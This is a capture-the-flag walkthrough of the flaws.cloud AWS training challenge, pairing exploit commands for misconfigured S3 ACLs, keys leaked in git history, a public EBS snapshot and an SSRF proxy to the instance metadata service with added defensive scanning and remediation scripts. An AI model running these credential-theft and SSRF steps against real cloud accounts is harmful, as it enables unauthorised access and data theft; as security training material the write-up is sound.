flaws.cloud
Level 1
Flaw: Permission misconfiguration: anyone, without any AWS credentials, could list the bucket contents (the bucket ACL grants list access to everyone).
List the bucket contents for flaws.cloud anonymously (--no-sign-request sends an unsigned request, so no AWS account is needed)
aws s3 ls s3://flaws.cloud --no-sign-request
Get the secret html file
aws s3 cp s3://flaws.cloud/secret-dd02c7c.html . --no-sign-request
Level 2
Configure AWS CLI with Access Key ID and Secret Access Key
$ aws configure --profile YOUR_PROFILE
AWS Access Key ID [********************]:
AWS Secret Access Key [********************]:
Default region name [ap-south-1]:
Default output format [text]:
Flaw: The bucket grants list access to the AuthenticatedUsers group, which means any AWS account in the world, not just accounts belonging to the bucket owner.
List the bucket contents for the level 2 URL using your own AWS account's profile
aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud --profile YOUR_PROFILE
Get the secret html file
aws s3 cp s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html . --profile YOUR_PROFILE
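The two flaws above are both bucket ACL grants to an AWS predefined group: AllUsers (Level 1, anonymous) and AuthenticatedUsers (Level 2, any AWS account). The check below is an added example, not part of the original writeup: it takes the JSON printed by aws s3api get-bucket-acl and prints every grant to one of those groups. The sample ACLs are constructed here (the owner IDs are placeholders; the group URIs are the real AWS identifiers), so it runs offline.

```shell
#!/bin/sh
# Added example (not from the flaws.cloud writeup): flag S3 bucket ACL grants to
# the anonymous/semi-anonymous AWS groups behind Level 1 and Level 2.
# Input: the JSON printed by `aws s3api get-bucket-acl --bucket <name>`.

# Constructed sample shaped like get-bucket-acl output (placeholder owner ID).
SAMPLE_ACL='{
    "Owner": { "DisplayName": "example", "ID": "0000000000000000000000000000000000000000000000000000000000000000" },
    "Grants": [
        { "Grantee": { "Type": "CanonicalUser", "ID": "0000000000000000000000000000000000000000000000000000000000000000", "DisplayName": "example" }, "Permission": "FULL_CONTROL" },
        { "Grantee": { "Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers" }, "Permission": "READ" },
        { "Grantee": { "Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" }, "Permission": "READ" }
    ]
}'

# Constructed sample of a bucket that only its owner can access.
SAMPLE_ACL_PRIVATE='{
    "Owner": { "DisplayName": "example", "ID": "0000000000000000000000000000000000000000000000000000000000000000" },
    "Grants": [
        { "Grantee": { "Type": "CanonicalUser", "ID": "0000000000000000000000000000000000000000000000000000000000000000", "DisplayName": "example" }, "Permission": "FULL_CONTROL" }
    ]
}'

# Print one line per risky grant: "<Group> <Permission>".
#   AllUsers           -> anyone, no credentials needed (Level 1: --no-sign-request works)
#   AuthenticatedUsers -> any AWS account anywhere, not just yours (Level 2)
# READ on a bucket ACL is exactly the "list the bucket" permission used above.
acl_public_grants() {
    # Flatten the pretty-printed JSON, put each grant object on its own line,
    # then pull out the group name and the permission granted to it.
    tr -d '\n' \
    | awk '{ gsub(/[}],[ \t]*[{]/, "}\n{"); print }' \
    | sed -n 's/.*groups\/global\/\([A-Za-z]*\)".*"Permission":[ ]*"\([A-Z_]*\)".*/\1 \2/p'
}

# Exit status 0 when at least one risky grant exists (handy in a loop over buckets).
acl_is_open() {
    [ -n "$(acl_public_grants)" ]
}

# Live usage:
#   aws s3api get-bucket-acl --bucket "$BUCKET" | acl_public_grants
# This only covers ACLs; a bucket policy (aws s3api get-bucket-policy) can open a
# bucket just as widely and needs its own review.
# Remediation (not run here): turn on Block Public Access for the bucket and grant
# access to specific principals through a bucket policy instead:
#   aws s3api put-public-access-block --bucket "$BUCKET" \
#     --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true
```

Run against the constructed open ACL it prints "AllUsers READ" and "AuthenticatedUsers READ"; against the private one it prints nothing.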
Level 3
Flaw: Bucket listing open to everyone, and AWS access keys leaked in a git commit (a later commit removed the file, but it is still in the history)
List the bucket contents for the level 3 URL using your AWS profile
aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --profile YOUR_PROFILE
Download the .git folder
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git l3-dump --profile YOUR_PROFILE
Check the git logs
git log
Check out the first commit (the one that added the keys before they were "removed")
git checkout {commit hash}
Check the commit contents
git show
Create a profile using the leaked credentials
aws configure --profile flaws-l3
Enter the AKIA access key ID and the secret access key from the git commit
List all the buckets for the newly created profile
aws s3 ls --profile flaws-l3
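The lesson of Level 3 is that deleting a file in a later commit does not remove it from history, so a scan has to run over git log -p, not over the checked-out tree. The script below is an added example, not part of the original writeup or the flaws.cloud repository: it reads git log -p output from stdin and reports every AWS access key ID together with the short hash of the commit it appears in, plus candidate 40-character secrets on lines mentioning "secret". The log it is fed is constructed inline with placeholder commit hashes and the AWS documentation example key pair (AKIAIOSFODNN7EXAMPLE / wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY), so it runs offline.

```shell
#!/bin/sh
# Added example (not from the flaws.cloud writeup): scan a git history for leaked
# AWS keys. Usage on a real checkout:  git log -p --all | find_aws_keys

# Constructed `git log -p` output: placeholder hashes, AWS docs example key pair.
# The newer commit deletes the file, the older one added it; both still leak it.
SAMPLE_GIT_LOG='commit f7cce5e5fe1b6b9d1d2a8c4d6e5f3a2b1c0d9e8f
Author: Example Dev <dev@example.com>
Date:   Mon Sep 18 09:00:00 2017 -0700

    Remove the keys that should not have been committed

diff --git a/access_keys.txt b/access_keys.txt
deleted file mode 100644
--- a/access_keys.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-access_key AKIAIOSFODNN7EXAMPLE
-secret_access_key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
Author: Example Dev <dev@example.com>
Date:   Sun Sep 17 09:00:00 2017 -0700

    first commit

diff --git a/access_keys.txt b/access_keys.txt
new file mode 100644
--- /dev/null
+++ b/access_keys.txt
@@ -0,0 +1,2 @@
+access_key AKIAIOSFODNN7EXAMPLE
+secret_access_key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
'

# Print "<12-char commit hash> <access key ID>" for every key ID in the history.
# AKIA = long-term IAM user key, ASIA = temporary (STS) key; both are 20 chars.
# Removed lines (leading "-") count too: the key is still recoverable from history.
find_aws_keys() {
    awk '/^commit [0-9a-f]+/ { c = substr($2, 1, 12); next } { print c " " $0 }' \
    | sed -E -n 's/^([0-9a-f]{12}) .*((AKIA|ASIA)[0-9A-Z]{16}).*/\1 \2/p' \
    | sort -u
}

# Secret access keys have no fixed prefix, so this is a heuristic: a 40-character
# base64-ish token on a line that mentions "secret". Review hits by hand.
find_aws_secret_candidates() {
    grep -Ei 'secret' | grep -Eo '[A-Za-z0-9/+]{40}' | sort -u
}

# After a hit: inspect the commit (git show <hash>), rotate the key in IAM
# (aws iam list-access-keys / delete-access-key), and only then rewrite history;
# rewriting alone does nothing for anyone who already cloned the repo.
```

On the constructed log it reports the example key once per commit (two lines, one per hash) and the example secret once.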
Level 4
Flaw: An EBS snapshot of the EC2 instance was shared publicly (create-volume permission granted to everyone), so anyone can copy the whole disk into their own account
Use nslookup to find the region: resolve the hostname, then reverse-resolve the returned IP address; the EC2 reverse DNS name (ec2-<ip>.<region>.compute.amazonaws.com) contains the region
nslookup 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud
Region: us-west-2
Using the flaws-l3 profile, look for EC2 snapshots (without --owner-id this returns every public snapshot in the region, so the owner filter below is what makes it useful)
aws ec2 describe-snapshots --profile flaws-l3
Get the account ID (the Account field) for the flaws-l3 keys; that account is the snapshot owner
aws --profile flaws-l3 sts get-caller-identity
List the ec2 snapshots for the particular owner
aws ec2 describe-snapshots --profile flaws-l3 --owner-id {owner-id} --region us-west-2
Create a volume from the snapshot in your own account using the snapshot ID (the snapshot lives in us-west-2, so the volume has to be created there)
aws --profile {YOUR_ACCOUNT} ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
Create an EC2 instance in the us-west-2 region (availability zone us-west-2a, same as the volume) and attach the new volume to it as an extra disk
Connect to the EC2 instance using ssh with the key pair created while setting up the instance
ssh -i "flaws4.pem" ubuntu@ec2-35-85-61-84.us-west-2.compute.amazonaws.com
Identify the filesystem on the attached volume and mount it (the device name here is /dev/xvdf1; on Nitro-based instance types the same volume shows up as /dev/nvme1n1p1)
sudo file -s /dev/xvdf1
sudo mount /dev/xvdf1 /mnt
Look around in the mounted snapshot. The setup script /home/ubuntu/setupNginx.sh contains the web server's basic-auth credentials:
flaws:nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
Enter the credentials in the basic-auth prompt of the level 4 page
Terminate the EC2 instance and delete the volume when done
Level 5
Flaw: An exposed HTTP proxy that does not block requests to the instance metadata service (169.254.169.254) or to private IP ranges
The IP address 169.254.169.254 is a magic IP in the cloud world. AWS, Azure, Google, DigitalOcean and others use it to let cloud resources find out metadata about themselves. It is link-local, so only the instance itself should be able to reach it; a proxy on the instance that forwards arbitrary URLs hands that access to anyone on the internet (a classic SSRF).
The juiciest part of the metadata is the set of temporary credentials for the instance profile (if one is attached). Those live under http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>; this writeup pulls the credential set served under identity-credentials/ec2/security-credentials/ec2-instance. Either way the response is JSON with AccessKeyId, SecretAccessKey, Token and Expiration. Caveat: this only works against IMDSv1; with IMDSv2 enforced (HttpTokens=required) every GET must carry a session token obtained via a PUT request, which a simple forwarding proxy cannot make.
Get the metadata listing through the proxy
curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
We get credentials at this URL
curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
Configure a profile using the keys
aws configure --profile flaws-l5
Add the Access Key ID, Secret Access Key and Session Token to the profile in ~/.aws/credentials (the token goes in aws_session_token; temporary credentials are rejected without it, and they stop working at the Expiration time)
List the contents of the level6 bucket
aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud --profile flaws-l5
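Turning the metadata JSON into a profile by hand is error-prone (the session token is the part people forget), so here is an added example, not part of the original writeup, that does the conversion: it reads the security-credentials JSON from stdin and prints a ready-to-append ~/.aws/credentials profile block, refusing anything whose Code is not "Success". The JSON is constructed to match the shape the metadata service returns (placeholder token, AWS documentation example key IDs), so it runs offline; nothing here talks to 169.254.169.254.

```shell
#!/bin/sh
# Added example (not from the flaws.cloud writeup): convert IMDS security-credentials
# JSON into an AWS CLI profile block. Live usage (Level 5):
#   curl -s http://<proxy>/169.254.169.254/latest/meta-data/iam/security-credentials/<role> \
#     | imds_creds_to_profile flaws-l5 >> ~/.aws/credentials

# Constructed sample shaped like the metadata service response.
# Key IDs are AWS documentation examples; the token is a placeholder.
SAMPLE_IMDS_CREDS='{
  "Code" : "Success",
  "LastUpdated" : "2017-03-01T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAIOSFODNN7EXAMPLE",
  "SecretAccessKey" : "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token" : "EXAMPLE-session-token==",
  "Expiration" : "2017-03-01T06:00:00Z"
}'

# Extract one string field from a flattened JSON document.
# $1 = JSON text, $2 = key. Good enough here: IMDS keys are unique and unnested.
json_field() {
    printf '%s' "$1" | sed -n 's/.*"'"$2"'"[ ]*:[ ]*"\([^"]*\)".*/\1/p'
}

# Read credentials JSON on stdin, print a credentials-file profile named $1.
imds_creds_to_profile() {
    profile="$1"
    json="$(tr -d '\n')"
    code="$(json_field "$json" Code)"
    if [ "$code" != "Success" ]; then
        echo "imds_creds_to_profile: unexpected Code: ${code:-<none>}" >&2
        return 1
    fi
    printf '[%s]\n' "$profile"
    printf 'aws_access_key_id = %s\n' "$(json_field "$json" AccessKeyId)"
    printf 'aws_secret_access_key = %s\n' "$(json_field "$json" SecretAccessKey)"
    # Instance-profile credentials are temporary: without the session token the
    # signed requests are rejected, and they expire at the Expiration timestamp.
    printf 'aws_session_token = %s\n' "$(json_field "$json" Token)"
}

# Defender side. This attack path needs IMDSv1: a plain GET through the proxy.
# IMDSv2 requires a session token from a PUT the proxy cannot make:
#   curl -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
# and that token as X-aws-ec2-metadata-token on every GET. Enforce it per instance:
#   aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required --http-endpoint enabled
# and find instances still on v1 with:
#   aws ec2 describe-instances --query 'Reservations[].Instances[].[InstanceId,MetadataOptions.HttpTokens]' --output text
```

Feeding the sample JSON to imds_creds_to_profile flaws-l5 prints a four-line [flaws-l5] block; a response without Code = Success produces no output and a non-zero exit status.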
Level 6
**Flaw: Extra permissions given to the user's IAM policies**
Create a profile using the provided credentials
aws configure --profile flaws-l6
Get information about the IAM user behind the profile
aws --profile flaws-l6 iam get-user
List the IAM policies attached to the user
aws --profile flaws-l6 iam list-attached-user-policies --user-name Level6
Get more info on the policy list_apigateways
aws --profile flaws-l6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
Get the policy document for the default version (DefaultVersionId from the previous output, here v4)
aws --profile flaws-l6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
The policy tells us we can call GET on the resource arn:aws:apigateway:us-west-2::/restapis/*
Enumerating the other policy, MySecurityAudit, shows it lets us see some things about Lambda functions. List the Lambda functions
aws --profile flaws-l6 --region us-west-2 lambda list-functions
Get the resource-based policy of the function; it names the API Gateway REST API allowed to invoke it, and the API ID is in the SourceArn
aws --profile flaws-l6 --region us-west-2 lambda get-policy --function-name Level6
Use the API ID s33ppypa75 and get the stage
aws --profile flaws-l6 --region us-west-2 apigateway get-stages --rest-api-id s33ppypa75
That tells you the stage name is "Prod". A Lambda function behind API Gateway is invoked through a URL built from the rest-api-id, region, stage name and resource path:
Format:
https://<API-id>.execute-api.<region>.amazonaws.com/<stage-name>/<resource>
API-id:
s33ppypa75
Region:
us-west-2
Stage:
Prod
Resource:
level6
URL : https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
Visiting that URL returns another URL, which is the final page of the challenge
_____ _ ____ __ __ _____
| || | / || |__| |/ ___/
| __|| | | o || | | ( \_
| |_ | |___ | || | | |\__ |
| _] | || _ || ` ' |/ \ |
| | | || | | \ / \ |
|__| |_____||__|__| \_/\_/ \___|
flAWS - The End